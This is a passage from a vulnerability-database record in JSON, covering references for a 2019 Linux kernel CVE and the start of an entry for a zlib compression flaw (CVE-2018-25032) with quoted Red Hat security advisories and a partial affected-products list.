"url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00066.html"
},
{
"trust": 1.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14835"
},
{
"trust": 0.5,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/vulnerabilities/kernel-vhost"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2019-14835"
},
{
"trust": 0.5,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15030"
},
{
"trust": 0.2,
"url": "https://usn.ubuntu.com/4135-1"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15031"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14821"
},
{
"trust": 0.2,
"url": "https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-10905"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14816"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20976"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14814"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-hwe/5.0.0-29.31~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.4.0-1122.131"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.0.0-1017.18"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure/4.15.0-1059.64"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1044.46"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.0.0-1017.17"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi2/5.0.0-1017.17"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/5.0.0-29.31"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/4.4.0-1094.105"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws-hwe/4.15.0-1050.52~16.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gke-4.15/4.15.0-1044.46"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1047.51"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1050.52"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-64.73"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1025.28~16.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1020.21~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/5.0.0-1021.22"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/5.0.0-1016.18"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.4.0-1058.65"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.4.0-1126.132"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oem/4.15.0-1056.65"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1046.46"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gke-5.0/5.0.0-1017.17~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1025.28"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1044.70"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/4.4.0-164.192"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1064.71"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1020.21"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-hwe/4.15.0-64.73~16.04.1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14815"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20856"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11478"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-2181"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10207"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11477"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-3846"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12614"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-21008"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10126"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14284"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14283"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11833"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-2054"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-0136"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20961"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14835"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-2215"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17054"
},
{
"trust": 0.1,
"url": "http://slackware.com"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16746"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17055"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17075"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15118"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17053"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-10906"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-10906"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-20976"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17052"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15117"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17133"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14816"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15505"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15098"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-16746"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17054"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-2215"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15118"
},
{
"trust": 0.1,
"url": "http://slackware.com/gpg-key"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-10905"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17056"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-3900"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15117"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17056"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14821"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10638"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15098"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17075"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17053"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-3900"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10638"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17055"
},
{
"trust": 0.1,
"url": "http://osuosl.org)"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14814"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17133"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15505"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17052"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/2974891"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/4135-2"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-146821"
},
{
"db": "PACKETSTORM",
"id": "154514"
},
{
"db": "PACKETSTORM",
"id": "154602"
},
{
"db": "PACKETSTORM",
"id": "154951"
},
{
"db": "PACKETSTORM",
"id": "154565"
},
{
"db": "PACKETSTORM",
"id": "155212"
},
{
"db": "PACKETSTORM",
"id": "154538"
},
{
"db": "PACKETSTORM",
"id": "154659"
},
{
"db": "PACKETSTORM",
"id": "154513"
},
{
"db": "PACKETSTORM",
"id": "154572"
},
{
"db": "PACKETSTORM",
"id": "154540"
},
{
"db": "NVD",
"id": "CVE-2019-14835"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-146821",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154514",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154602",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154951",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154565",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "155212",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154538",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154659",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154513",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154572",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154540",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2019-14835",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2019-09-17T00:00:00",
"db": "VULHUB",
"id": "VHN-146821",
"ident": null
},
{
"date": "2019-09-18T21:22:40",
"db": "PACKETSTORM",
"id": "154514",
"ident": null
},
{
"date": "2019-09-25T17:55:27",
"db": "PACKETSTORM",
"id": "154602",
"ident": null
},
{
"date": "2019-10-23T18:32:10",
"db": "PACKETSTORM",
"id": "154951",
"ident": null
},
{
"date": "2019-09-23T18:26:18",
"db": "PACKETSTORM",
"id": "154565",
"ident": null
},
{
"date": "2019-11-08T15:37:19",
"db": "PACKETSTORM",
"id": "155212",
"ident": null
},
{
"date": "2019-09-20T14:57:38",
"db": "PACKETSTORM",
"id": "154538",
"ident": null
},
{
"date": "2019-09-30T04:44:44",
"db": "PACKETSTORM",
"id": "154659",
"ident": null
},
{
"date": "2019-09-18T21:22:34",
"db": "PACKETSTORM",
"id": "154513",
"ident": null
},
{
"date": "2019-09-23T18:31:46",
"db": "PACKETSTORM",
"id": "154572",
"ident": null
},
{
"date": "2019-09-20T14:57:53",
"db": "PACKETSTORM",
"id": "154540",
"ident": null
},
{
"date": "2019-09-17T16:15:10.980000",
"db": "NVD",
"id": "CVE-2019-14835",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-02-12T00:00:00",
"db": "VULHUB",
"id": "VHN-146821",
"ident": null
},
{
"date": "2024-11-21T04:27:27.790000",
"db": "NVD",
"id": "CVE-2019-14835",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "local",
"sources": [
{
"db": "PACKETSTORM",
"id": "154514"
},
{
"db": "PACKETSTORM",
"id": "154951"
},
{
"db": "PACKETSTORM",
"id": "154513"
}
],
"trust": 0.3
},
"title": {
"_id": null,
"data": "Ubuntu Security Notice USN-4135-1",
"sources": [
{
"db": "PACKETSTORM",
"id": "154514"
}
],
"trust": 0.1
},
"type": {
"_id": null,
"data": "overflow",
"sources": [
{
"db": "PACKETSTORM",
"id": "154602"
},
{
"db": "PACKETSTORM",
"id": "154565"
},
{
"db": "PACKETSTORM",
"id": "154538"
},
{
"db": "PACKETSTORM",
"id": "154659"
},
{
"db": "PACKETSTORM",
"id": "154540"
}
],
"trust": 0.5
}
}
VAR-202203-1690
Vulnerability from variot - Updated: 2026-03-09 20:35zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches. Description:
Red Hat Advanced Cluster Management for Kubernetes 2.3.11 images
Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in. Bugs fixed (https://bugzilla.redhat.com/):
2057544 - Cancel rpm-ostree transaction after failed rebase 2058674 - whereabouts IPAM CNI ip-reconciler cronjob specification requires hostnetwork, api-int lb usage & proper backoff 2062655 - [4.8.z backport] cluster scaling new nodes ovs-configuration fails on all new nodes 2070762 - [4.8z] WebScale: duplicate ecmp next hop error caused by multiple of the same gateway IPs in ovnkube cache 2074053 - Internal registries with a big number of images delay pod creation due to recursive SELinux file context relabeling 2074680 - csv_succeeded metric not present in olm-operator for all successful CSVs 2076211 - CVE-2022-1677 openshift/router: route hijacking attack via crafted HAProxy configuration file 2077004 - Bump to latest available 1.21.11 k8s 2077370 - [4.8.z] NetworkPolicy tests are failing on metal IPv6 2077765 - (release-4.8) Gather namespace names with overlapping UID ranges 2078477 - Latest ose-jenkins-agent-base:v4.9.0 image fails to start on OpenShift due to FIPS error 2084259 - [4.8] OCP ignores STOPSIGNAL in Dockerfile and sends SIGTERM 2088196 - Redfish set boot device failed for node in OCP 4.8 latest RC
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
Synopsis: Important: zlib security update Advisory ID: RHSA-2023:0943-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2023:0943 Issue date: 2023-02-28 CVE Names: CVE-2018-25032 =====================================================================
- Summary:
An update for zlib is now available for Red Hat Enterprise Linux 7.7 Advanced Update Support, Red Hat Enterprise Linux 7.7 Telco Extended Update Support, and Red Hat Enterprise Linux 7.7 Update Services for SAP Solutions.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Server AUS (v. 7.7) - x86_64 Red Hat Enterprise Linux Server E4S (v. 7.7) - ppc64le, x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 7.7) - x86_64 Red Hat Enterprise Linux Server Optional E4S (v. 7.7) - ppc64le, x86_64 Red Hat Enterprise Linux Server Optional TUS (v. 7.7) - x86_64 Red Hat Enterprise Linux Server TUS (v. 7.7) - x86_64
- Description:
The zlib packages provide a general-purpose lossless data compression library that is used by many different programs.
Security Fix(es):
- zlib: A flaw found in zlib when compressing (not decompressing) certain inputs (CVE-2018-25032)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
2067945 - CVE-2018-25032 zlib: A flaw found in zlib when compressing (not decompressing) certain inputs
- Package List:
Red Hat Enterprise Linux Server AUS (v. 7.7):
Source: zlib-1.2.7-18.el7_7.1.src.rpm
x86_64: zlib-1.2.7-18.el7_7.1.i686.rpm zlib-1.2.7-18.el7_7.1.x86_64.rpm zlib-debuginfo-1.2.7-18.el7_7.1.i686.rpm zlib-debuginfo-1.2.7-18.el7_7.1.x86_64.rpm zlib-devel-1.2.7-18.el7_7.1.i686.rpm zlib-devel-1.2.7-18.el7_7.1.x86_64.rpm
Red Hat Enterprise Linux Server E4S (v. 7.7):
Source: zlib-1.2.7-18.el7_7.1.src.rpm
ppc64le: zlib-1.2.7-18.el7_7.1.ppc64le.rpm zlib-debuginfo-1.2.7-18.el7_7.1.ppc64le.rpm zlib-devel-1.2.7-18.el7_7.1.ppc64le.rpm
x86_64: zlib-1.2.7-18.el7_7.1.i686.rpm zlib-1.2.7-18.el7_7.1.x86_64.rpm zlib-debuginfo-1.2.7-18.el7_7.1.i686.rpm zlib-debuginfo-1.2.7-18.el7_7.1.x86_64.rpm zlib-devel-1.2.7-18.el7_7.1.i686.rpm zlib-devel-1.2.7-18.el7_7.1.x86_64.rpm
Red Hat Enterprise Linux Server TUS (v. 7.7):
Source: zlib-1.2.7-18.el7_7.1.src.rpm
x86_64: zlib-1.2.7-18.el7_7.1.i686.rpm zlib-1.2.7-18.el7_7.1.x86_64.rpm zlib-debuginfo-1.2.7-18.el7_7.1.i686.rpm zlib-debuginfo-1.2.7-18.el7_7.1.x86_64.rpm zlib-devel-1.2.7-18.el7_7.1.i686.rpm zlib-devel-1.2.7-18.el7_7.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional AUS (v. 7.7):
x86_64: minizip-1.2.7-18.el7_7.1.i686.rpm minizip-1.2.7-18.el7_7.1.x86_64.rpm minizip-devel-1.2.7-18.el7_7.1.i686.rpm minizip-devel-1.2.7-18.el7_7.1.x86_64.rpm zlib-debuginfo-1.2.7-18.el7_7.1.i686.rpm zlib-debuginfo-1.2.7-18.el7_7.1.x86_64.rpm zlib-static-1.2.7-18.el7_7.1.i686.rpm zlib-static-1.2.7-18.el7_7.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional E4S (v. 7.7):
ppc64le: minizip-1.2.7-18.el7_7.1.ppc64le.rpm minizip-devel-1.2.7-18.el7_7.1.ppc64le.rpm zlib-debuginfo-1.2.7-18.el7_7.1.ppc64le.rpm zlib-static-1.2.7-18.el7_7.1.ppc64le.rpm
x86_64: minizip-1.2.7-18.el7_7.1.i686.rpm minizip-1.2.7-18.el7_7.1.x86_64.rpm minizip-devel-1.2.7-18.el7_7.1.i686.rpm minizip-devel-1.2.7-18.el7_7.1.x86_64.rpm zlib-debuginfo-1.2.7-18.el7_7.1.i686.rpm zlib-debuginfo-1.2.7-18.el7_7.1.x86_64.rpm zlib-static-1.2.7-18.el7_7.1.i686.rpm zlib-static-1.2.7-18.el7_7.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional TUS (v. 7.7):
x86_64: minizip-1.2.7-18.el7_7.1.i686.rpm minizip-1.2.7-18.el7_7.1.x86_64.rpm minizip-devel-1.2.7-18.el7_7.1.i686.rpm minizip-devel-1.2.7-18.el7_7.1.x86_64.rpm zlib-debuginfo-1.2.7-18.el7_7.1.i686.rpm zlib-debuginfo-1.2.7-18.el7_7.1.x86_64.rpm zlib-static-1.2.7-18.el7_7.1.i686.rpm zlib-static-1.2.7-18.el7_7.1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2018-25032 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2023 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBY/3zpNzjgjWX9erEAQgopRAAnicJE4nJGD63kGm+PqFucbREdCZ3tCHM ppSjAZYm6e3z2cXqCA8Y/ZQxQjLGFUuT3PtzsD8eehFIu7WL6hO7s+jVaor/PYxG h1X9YRrtAGlCrMwUXgSpTmqCeXMofoXhZRgj/0fJASp/+C6sMOBYyJkPsSCT00fu bIU/TEKTFa6UNjLGBZLNMD1htyYAI70mrLp+zJB4HlFP8G7bX8XMduBwyFu8l9Ye C4u9A4n1yUWo6eJpK1jn91y9W0VcB2JEnCQ3CySVI4Oa0hzSQBEfVnGDicELtAcv F6yV4AcCk30JtsXLtihnZszk5Ke0uH/VICY9ubPH52rBqLzCELWrAtEkcfGJnPFr /TrCfgDC9vIDE9+QPWamraX62NKy9vwOf/pPOnSOGJUYngYuVIJl/ipWwbr0BhLd J3Ckbo0jlXjjXmMKnfv0LDr/0dvLNGc4VjqbEcJULNMiUu3Lh/I0/v3H7NCr8674 RFDBaKXJlzgJGCcQ7JFr/63Aw6kOp9lVJgjbnDYs1AV/FQVkLsIvw5hIdONZI5cP uJcrO4lfjw/4827E7gdBTnQEBRuZB/wGtmtcFrvIPiK+qWl0t457ic+nvDl8noiM kBZezS7yByEjCqudJgxEYrB8uUt+gX9aj08sqeyM9jSzUCpJAVCNycufQGvmblNA vP1CheTiOdc= =wNUm -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . 8) - noarch
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.7 Release Notes linked from the References section. Bugs fixed (https://bugzilla.redhat.com/):
2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements 2053532 - CVE-2022-23772 golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString 2053541 - CVE-2022-23773 golang: cmd/go: misinterpretation of branch names can lead to incorrect access control
- JIRA issues fixed (https://issues.jboss.org/):
SRVKE-1217 - New KafkaSource implementation does not default to PLAIN for SASL
- Description:
Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.
This advisory contains the container images for Red Hat OpenShift Container Platform 4.7.51. See the following advisory for the RPM packages for this release:
https://access.redhat.com/errata/RHBA-2022:2267
Space precludes documenting all of the container images in this advisory.
You may download the oc tool and use it to inspect release image metadata as follows:
(For x86_64 architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.51-x86_64
The image digest is sha256:539c1f5982343e0709179f305e347560304fdeb89a09bd042a59a58a836a0940
(For s390x architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.51-s390x
The image digest is sha256:f6fa9f75e6de166b6daccbc6830bbeaade38eac97faa2752e0c38af23aa4135e
(For ppc64le architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.51-ppc64le
The image digest is sha256:e4a1eb51749bdb0fa429e5b7f697d3b38cd32b76786dc1ce579a5d53827705b0
All OpenShift Container Platform 4.7 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster-cli.html
- Solution:
For OpenShift Container Platform 4.7 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html
Details on how to access this content are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster-cli.html
- Bugs fixed (https://bugzilla.redhat.com/):
2057526 - cloud provider config change breaks the cluster 2076211 - CVE-2022-1677 openshift/router: route hijacking attack via crafted HAProxy configuration file 2081483 - csv_succeeded metric not present in olm-operator for all successful CSVs 2082029 - Bump to latest available 1.20.15 k8s
- Summary:
The Migration Toolkit for Containers (MTC) 1.7.2 is now available. Description:
The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):
2007557 - CVE-2021-3807 nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes 2038898 - [UI] ?Update Repository? option not getting disabled after adding the Replication Repository details to the MTC web console 2040693 - ?Replication repository? wizard has no validation for name length 2040695 - [MTC UI] ?Add Cluster? wizard stucks when the cluster name length is more than 63 characters 2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor 2048537 - Exposed route host to image registry? connecting successfully to invalid registry ?xyz.com? 2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak 2055658 - [MTC UI] Cancel button on ?Migrations? page does not disappear when migration gets Failed/Succeeded with warnings 2056962 - [MTC UI] UI shows the wrong migration type info after changing the target namespace 2058172 - [MTC UI] Successful Rollback is not showing the green success icon in the ?Last State? field. 2058529 - [MTC UI] Migrations Plan is missing the type for the state migration performed before upgrade 2061335 - [MTC UI] ?Update cluster? button is not getting disabled 2062266 - MTC UI does not display logs properly [OADP-BL] 2062862 - [MTC UI] Clusters page behaving unexpectedly on deleting the remote cluster?s service account secret from backend 2074675 - HPAs of DeploymentConfigs are not being updated when migration from Openshift 3.x to Openshift 4.x 2076593 - Velero pod log missing from UI drop down 2076599 - Velero pod log missing from downloaded logs folder [OADP-BL] 2078459 - [MTC UI] Storageclass conversion plan is adding migstorage reference in migplan 2079252 - [MTC] Rsync options logs not visible in log-reader pod 2082221 - Don't allow Storage class conversion migration if source cluster has only one storage class defined [UI] 2082225 - non-numeric user when launching stage pods [OADP-BL] 2088022 - Default CPU requests on Velero/Restic are too demanding making scheduling fail in certain environments 2088026 - Cloud propagation phase in migration controller is not doing anything due to missing labels on Velero pods 2089126 - [MTC] Migration controller cannot find Velero Pod because of wrong labels 2089411 - [MTC] Log reader pod is missing velero and restic pod logs [OADP-BL] 2089859 - [Crane] DPA CR is missing the required flag - Migration is getting failed at the EnsureCloudSecretPropagated phase due to the missing secret VolumeMounts 2090317 - [MTC] mig-operator failed to create a DPA CR due to null values are passed instead of int [OADP-BL] 2096939 - Fix legacy operator.yml inconsistencies and errors 2100486 - [MTC UI] Target storage class field is not getting respected when clusters don't have replication repo configured
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "mariadb",
"scope": "lt",
"trust": 1.0,
"vendor": "mariadb",
"version": "10.8.4"
},
{
"_id": null,
"model": "scalance sc626-2c",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.0"
},
{
"_id": null,
"model": "macos",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "11.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"_id": null,
"model": "e-series santricity os controller",
"scope": "gte",
"trust": 1.0,
"vendor": "netapp",
"version": "11.0.0"
},
{
"_id": null,
"model": "mariadb",
"scope": "lt",
"trust": 1.0,
"vendor": "mariadb",
"version": "10.6.9"
},
{
"_id": null,
"model": "mariadb",
"scope": "gte",
"trust": 1.0,
"vendor": "mariadb",
"version": "10.6.0"
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "zlib",
"scope": "gte",
"trust": 1.0,
"vendor": "zlib",
"version": "1.2.2.2"
},
{
"_id": null,
"model": "mariadb",
"scope": "lt",
"trust": 1.0,
"vendor": "mariadb",
"version": "10.7.5"
},
{
"_id": null,
"model": "hci compute node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "35"
},
{
"_id": null,
"model": "mac os x",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "10.15"
},
{
"_id": null,
"model": "management services for element software",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "zulu",
"scope": "eq",
"trust": 1.0,
"vendor": "azul",
"version": "6.45"
},
{
"_id": null,
"model": "python",
"scope": "lt",
"trust": 1.0,
"vendor": "python",
"version": "3.10.5"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "11.0"
},
{
